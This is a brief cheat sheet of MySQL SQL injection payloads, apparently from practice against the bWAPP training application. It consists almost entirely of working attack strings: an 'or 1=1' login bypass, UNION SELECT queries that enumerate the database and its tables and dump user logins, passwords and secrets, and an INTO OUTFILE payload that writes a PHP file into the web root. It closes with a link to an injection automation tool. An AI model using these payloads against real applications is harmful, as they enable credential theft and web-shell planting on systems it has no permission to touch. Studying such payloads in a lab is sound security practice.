MYSQL:
(‘– ‘ is to comment out anything behind, don’t forget the space behind to sperate the tailing text)
‘ or 1=1 —
‘ and 1=0 union (select database(),1,1,1,1,1,1) —
‘ and 1=0 union (select table_name,1,1,1,1,1,1 from information_schema.tables) —
‘ and 1=0 union (select 1,id,login,password,secret,1,1 from users) —
a’ UNION SELECT 1, “”,1,1,1,1,1 INTO OUTFILE “/var/www/bWAPP/images/yabadooo.php” —
SQL Injection Automation:
http://sqlmap.org/